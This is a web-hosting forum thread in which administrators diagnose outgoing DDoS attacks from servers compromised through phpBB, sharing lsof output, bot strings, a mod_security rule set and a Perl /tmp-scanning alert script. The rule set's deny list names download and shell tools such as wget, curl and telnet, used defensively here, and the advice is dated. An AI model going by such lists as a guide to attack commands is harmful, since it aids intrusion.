DDOS Attacks from my Server ...need help

Higgins

Well-Known Member
Jan 31, 2003
82
0
156
Since today we have DDOs Attacks from our Server. It starts with a simple wget.pl File in /tmp Dir, then we can see many perl processes and the Attack starts. The wget.pl file is owned by nobody but when i grep in Domlogs for "wget" or "tmp" or what ever i couldnt find anything.
During the Attack i run lsof | grep PID and got:

perl 6839 nobody cwd DIR 8,1 4096 2 /
perl 6839 nobody rtd DIR 8,1 4096 2 /
perl 6839 nobody txt REG 8,1 15468 1159004 /usr/bin/perl
perl 6839 nobody mem REG 8,1 3380065 1224141 /usr/lib/perl5/5.8.1/i386-linux-thread-multi/CORE/libperl.so
perl 6839 nobody mem REG 8,1 105725 1191483 /usr/lib/perl5/5.8.1/i386-linux-thread-multi/auto/Socket/Socket.so
perl 6839 nobody mem REG 8,1 101264 1763195 /lib/tls/libpthread-0.60.so
perl 6839 nobody mem REG 8,1 24848 783389 /lib/libcrypt-2.3.2.so
perl 6839 nobody mem REG 8,1 93028 783378 /lib/libnsl-2.3.2.so
perl 6839 nobody mem REG 8,1 19984 783388 /lib/libnss_dns-2.3.2.so
perl 6839 nobody mem REG 8,1 52784 783377 /lib/libnss_files-2.3.2.so
perl 6839 nobody mem REG 8,1 107724 783468 /lib/ld-2.3.2.so
perl 6839 nobody mem REG 8,1 1578228 1762584 /lib/tls/libc-2.3.2.so
perl 6839 nobody mem REG 8,1 16312 783517 /lib/libdl-2.3.2.so
perl 6839 nobody mem REG 8,1 213244 1762587 /lib/tls/libm-2.3.2.so
perl 6839 nobody mem REG 8,1 78048 783520 /lib/libresolv-2.3.2.so
perl 6839 nobody mem REG 8,1 14116 783518 /lib/libutil-2.3.2.so
perl 6839 nobody mem REG 8,1 135788 97965 /usr/lib/perl5/5.8.1/i386-linux-thread-multi/auto/IO/IO.so
perl 6839 nobody mem REG 8,1 33513072 1207911 /usr/lib/locale/locale-archive
perl 6839 nobody 0r CHR 1,3 34183 /dev/null
perl 6839 nobody 1w FIFO 0,5 91861346 pipe
perl 6839 nobody 2w FIFO 0,5 91861346 pipe
perl 6839 nobody 3u IPv4 91861354 TCP myserver.tld:40347->victimip:domain (ESTABLISHED)
perl 6839 nobody 4u REG 7,0 0 28 /tmp/ZCUDNcdkME (deleted)
perl 6839 nobody 5w FIFO 0,5 91846064 pipe
perl 6839 nobody 6r FIFO 0,5 91846065 pipe
perl 6839 nobody 7u unix 0xe83a0c00 91860371 socket
perl 6839 nobody 8r FIFO 0,5 91846066 pipe
perl 6839 nobody 9u IPv4 91860382 TCP myserver.tld:40345->srv03.victimsserver:http (CLOSE_WAIT)
Also i have APF installed but it does not block these attacks. So i have no clue how this File goes to the tmp Directory with User nobody but i couldnt find it in the Logs.

Cann anyone please help me out ?
 

DigiCrime

Well-Known Member
Nov 27, 2002
399
0
166
You run this ?

for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;

i take it the attack is outgoing? or is it incoming ?
 

chirpy

Well-Known Member
Verifed Vendor
Jun 15, 2002
13,466
31
473
Go on, have a guess
It's most likely to be a vulnerable php script on the server and the most likely vulnerable app these days is either phpBB or phpNuke. You should install WHM > Addon Modules > Addon Script Manager > refresh your browser and scroll down on the left to the bottom and click on Addons > Addon Script Manager and force update any phpBB, and if installed phpNuke, installations. You should also look at installing mod_security either through WHM or manually and add a good set of secfilter lists (search the forums for mod_security).
 

DigiCrime

Well-Known Member
Nov 27, 2002
399
0
166
Whats just gonna suggest mod_security. I dont think that Addon Manager works for those who installed phpBB using their own method, if installed by Cpanel script it'll find it but not for certain 100%


For Apache 1 heres what I use

wget http://www.modsecurity.org/download/modsecurity-1.8.7.tar.gz;tar -zxf modsecurity-1.8.7.tar.gz;cd mod*;cd apache1;/etc/httpd/bin/apxs -cia mod_security.c;pico /usr/local/apache/conf/httpd.conf;service httpd restart

in httpd.conf place this in

Code:
<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine On

# Change Server: string
SecServerSignature "Apache"


# This setting should be set to On only if the Web site is
# using the Unicode encoding. Otherwise it may interfere with
# the normal Web site operation.
SecFilterCheckUnicodeEncoding Off

# The audit engine works independently and
# can be turned On of Off on the per-server or
# on the per-directory basis. "On" will log everything,
# "DynamicOrRelevant" will log dynamic requests or violations,
# and "RelevantOnly" will only log policy violations
SecAuditEngine RelevantOnly

# The name of the audit log file
SecAuditLog logs/audit_log

# Should mod_security inspect POST payloads
SecFilterScanPOST On

# Action to take by default
SecFilterDefaultAction "deny,log,status:403"

## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ##

# Require HTTP_USER_AGENT and HTTP_HOST in all requests
# SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

# Require Content-Length to be provided with
# every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"

# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

# phpBB filter 
SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"

# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
SecFilterSelective ARG_p|ARG_page "^(http|https|ftp):/ "
SecFilterSelective THE_REQUEST "cd /dev/shm "
SecFilterSelective THE_REQUEST "/usr/bin/gcc "

</IfModule>
In the mean time delete everything in /tmp besides your mysql.sock file maybe reboot the system to to freshen everything up
 
May 20, 2005
8
0
151
Somebody has a php script which makes the wget.pl file and runs it as nobody. The easiest solution to this would be to rebuild apache to support php suexec so that php scripts get executed as the user who owns them instead of "nobody". This increases security overall and helps you track down such scripts.

Other than that, only solution I can think of is to check the creation date of wget.pl and check your apache logs for that time
 

AndyReed

Well-Known Member
PartnerNOC
May 29, 2004
2,221
4
193
Minneapolis, MN
Just in case you recompile Apache with Phpsuexec, you'll need to chmod 755 all Php scripts in the /home directory. Otherwise, php scripts won't work.
 

wa4fat

Well-Known Member
Dec 30, 2001
51
1
308
My server apparently also under attack

I have been experiencing an apparently similar DDOS attack recently, which consumes all my server's resources and eventually (if undetected) brings the box down. A tell-tale file in the /tmp directory is the only evidence I've been able to locate, and a GOOGLE of the text in this file points to a few mentions of DDOS code, either via IRC or through some exploit in PHPBB. A sample of the wording in this file includes:

Password too long!
Disable sucessful
Removed all spoofs
What kind of subnet address is that? Do something like: 169.40
NOTICE %s :TSUNAMI <target> <secs>

I'd be grateful for any suggestions as to what you might do to prevent this from occurring, or to locate the source.

Thanks very much in advance!
 

AndyReed

Well-Known Member
PartnerNOC
May 29, 2004
2,221
4
193
Minneapolis, MN
You'll need to secure your server. The problem I see with many people, including our clients, is that they won't secure their servers either out of ignorance, or don't know how, or don't want to spend money on hiring a company to secure their servers. The vast majority of clients come to us screaming for help after the damage is being done to their servers.

I suggest you search this forum and find threads discussing security issues.
http://forums.cpanel.net/search.php?searchid=577414
http://forums.cpanel.net/search.php?searchid=577415
 

GordonH

Well-Known Member
Sep 6, 2001
104
0
316
The cpanel advanced guest book script is the most commony exploited script we havbe to deal with. It will accept character substitution hacks allowing people to write files to other locations in the account.
Its popular with phishing scammers for getting their html into your accounts.

We would prefer to have the ability to stop the guest book appearing in cpanel but I am not going to edit the skin on 100+ servers.
 

ehsan

Well-Known Member
Dec 11, 2001
185
0
316
we had similar problem in one of the servers too!
problem was phpbb again! this time I found out WHM Addon Script Manager doesn't update all phpBB installations! well, I guess it shouldn't be responsible for manual installations anyway! but I think it only detects /forum folders....

in our case hacker was over flowing eth0
hacker wrote this files to /tmp using phpbb:

.\ .\ ./ a2.pl cof.txt log.txt ret.pl ses sesions theme_info.cfg udp.pl

notice that the first one is a folder name: . . .

well I was lucky that my cron job found them :) and I was able to get on top of it right away...

anyway, new version of phpbb is out(.15) but cpanel still installes .13

I have the source to his files, anyone knows where can I send these files to help preventing the same problem for others?
 

GordonH

Well-Known Member
Sep 6, 2001
104
0
316
On a related issue this is why I will not use fantastico.
It would be very bad if there were exploits of the scripts it installed as we would have to patach all the sites manually.
 

ehsan

Well-Known Member
Dec 11, 2001
185
0
316
someone sent me a pm about the script, here is the code:
full article can also be found at:
http://www.myserver.us/articles/checking-server-for-hackers-sample-script-tmp-directory-check.html


Code:
#! /usr/bin/perl

###################################################################
# Author: Mohammad Ranji
# Script will check into XXX directory to see
# if there is any file that has YYY keyword in it
# this is useful to find possible hacks for example
# perl files in /tmp 
# for full article visit 
# http://www.myserver.us/articles/checking-server-for-hackers-sample-script-tmp-directory-check.html
###################################################################


#########################################################
###################### CONFIG #############################
#########################################################

#this is used to send email
#if you don't have this module comment this part out
#and set send_email=0
use MIME::Lite;


$send_email=1;                                             #change to 0 if you want to disable sending emails
$to="your-pager\@domain.com";                     #dont forget \@ instead of @
$from="you\@domain.com";
$mailserver="mail.example.com";
@what=("perl","#!/bin/");                                #add more keywords to look for if needed
$lookin="/tmp"; #directory to look into
$script_location="/checktmp/";                         #where is this script?

#########################################################
#################### END CONFIG #########################
#########################################################


chdir $script_location || die "Can't cd to $script_location: $!\n";


for($i=0; $i< scalar(@what); $i++){

@files=`grep @what[$i] $lookin -R`;
for($j=0; $j< scalar(@files); $j++){
found(@what[$i],@files[$j]);
}
}

sub found{

my $what = $_[0];
my $where= $_[1];


#lets log what we found into a file first
#finding filename for today
$file=`date '+%F'`.".log";
$file=~ s/ /_/g;
#replacing all spaces with _ if any exists

$file=~ s/\n//g;
#replacing \n with ""

if (-e "$file"){
#file exists for today
open(LOG,">>$file") || die("Cannot Open $file");
} else {
#create new file
open(LOG, "+>>$file") || die("Cannot Open $file");
#file created
close(LOG);

open(LOG,">>$file") || die("Cannot Open fileg");
#open for append
}


$date=`date`;
print LOG "$what was found in $where at $date\n";


$subject="Alert";
$message="$what was found in $where at $date.";

#should we email what we found?
if($send_email==1){
email("$to","$from", $subject, $message);
}
}

sub email
{
# get incoming parameters
local ($to, $from, $subject, $message) = @_;

# create a new message
$msg = MIME::Lite->new(
From => $from,
To => $to,
Subject => $subject,
Data => $message
);


# send the email
MIME::Lite->send('smtp', $mailserver, Timeout => 60);
$msg->send();
}
 
Last edited:

chirpy

Well-Known Member
Verifed Vendor
Jun 15, 2002
13,466
31
473
Go on, have a guess
GordonH said:
The cpanel advanced guest book script is the most commony exploited script we havbe to deal with. It will accept character substitution hacks allowing people to write files to other locations in the account.
Have you informed cPanel about this? I.e. logged it in bugzilla and emails [email protected]?
 

ehsan

Well-Known Member
Dec 11, 2001
185
0
316
Why do I need to update cpanel installation when it is suppose to fetch the update from cpanel server for add-ons! Specially when I use add-on update module?
 

chirpy

Well-Known Member
Verifed Vendor
Jun 15, 2002
13,466
31
473
Go on, have a guess
It entirely depends what version of cPanel you are running? If it's pre 10.0.something then it's old, insecure, and running the old update system and you should upgrade it to the current tree of your choice. If it's newer than that, then what version are you running and what do you have set for each of the options under WHM > Update Config?